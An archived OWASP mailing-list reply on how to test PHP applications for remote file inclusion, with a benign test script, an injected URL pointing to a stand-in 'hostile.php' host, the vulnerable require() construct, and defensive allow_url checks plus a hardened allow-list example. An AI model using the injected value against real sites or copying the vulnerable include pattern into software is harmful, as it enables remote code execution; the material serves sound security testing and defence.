[Owasp-testing] Remote File include vulnerability

Andrew van der Stock vanderaj at owasp.org
Tue Apr 10 13:29:32 EDT 2007


Hi there,

You will generally find a construct like this:

require ($foo.'.inc.php');

To obviate this, you need to do two things:

Install a file somewhere on the Internet or on your computer if you're
testing locally (recommended). I like

<?php
echo "pwned";
exit;
?>

Change the variable, foo, to point at your script. If $foo is a variable
from the user, like foo in the post, get or cookie collection, you need
something like a browser or at worst, Firefox Web Developer toolbar or
WebScarab to modify the contents of foo to:

http://www.example.com/hostile.php?dummy=

That way, your script is called like this:

http://www.example.com/hostile.php?dummy=.inc.php

The PHP interpreter (which will almost always have allow_url_fopen turned on
- STUPID!, STUPID!, STUPID! A friendly message to our PHP developer friends)
will then retrieve, tokenize and execute your script as if it were local to
the file system.

My view is that scripts should have the following code before any include /
require statements and definitely before any file or stream operations:

// allow_url_fopen is PHP_INI_SYSTEM, so ini_set() fails and the script stops
if ( ini_get('allow_url_fopen') == '1' &&
        @ini_set('allow_url_fopen', '0') === false ) {
    die("Cannot continue - allow_url_fopen is set to 1, which is extremely
dangerous. Disable this in php.ini before continuing");
}
// PHP 5.2.0 and later
if ( ini_get('allow_url_include') == '1' &&
        @ini_set('allow_url_include', '0') === false ) {
    die("Cannot continue - allow_url_include is set to 1, which is extremely
dangerous. Disable this in php.ini before continuing");
}

Andrew
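As an added example (not from Andrew's post or any OWASP project), the vulnerable construct from the post beside a hardened replacement that maps the request value through an allow-list, pins the include directory, and repeats the allow_url_include check; the page names and the includes/ directory are assumptions.

```php
<?php
// Added example, not from the original post. Page names and the
// includes/ directory are illustrative assumptions.

// Vulnerable: $foo comes straight from the request, so any stream wrapper
// (http://, ftp://, php://, data:) or traversal sequence reaches require().
function includePageVulnerable(string $foo): void
{
    require($foo . '.inc.php');
}

// Hardened: the request value selects a fixed file from an allow-list, the
// resolved path must stay under the include directory, and remote includes
// are refused at runtime as defence in depth (mirrors the check in the post).
function includePageSafe(string $foo): void
{
    if (ini_get('allow_url_include') == '1' &&
        @ini_set('allow_url_include', '0') === false) {
        die('Cannot continue: allow_url_include is enabled; disable it in php.ini');
    }

    // Only these names may ever be included; anything else is rejected outright.
    $allowed = ['home' => 'home', 'about' => 'about', 'contact' => 'contact'];
    if (!isset($allowed[$foo])) {
        http_response_code(404);
        exit('Unknown page');
    }

    // Resolve the final path and confirm it still lies inside the include
    // directory, so a stray symlink or misconfiguration cannot escape it.
    $baseDir = realpath(__DIR__ . '/includes');
    $target  = realpath($baseDir . '/' . $allowed[$foo] . '.inc.php');
    if ($baseDir === false || $target === false ||
        strpos($target, $baseDir . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(404);
        exit('Unknown page');
    }

    require $target;
}

// Request handling: the parameter name 'foo' follows the original post.
includePageSafe((string) ($_GET['foo'] ?? 'home'));
```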
 


On 4/10/07 12:45 PM, "Denise Spiteri" <denise.spi at gmail.com> wrote:

> Hi to all, 
>  
>             Can someone please tell me, how to carry out penetration testing
> for Remote File Include Vulnerability?
>  
> Denise
>  
> 
> 
> _______________________________________________
> Owasp-testing mailing list
> Owasp-testing at lists.owasp.org
> http://lists.owasp.org/mailman/listinfo/owasp-testing
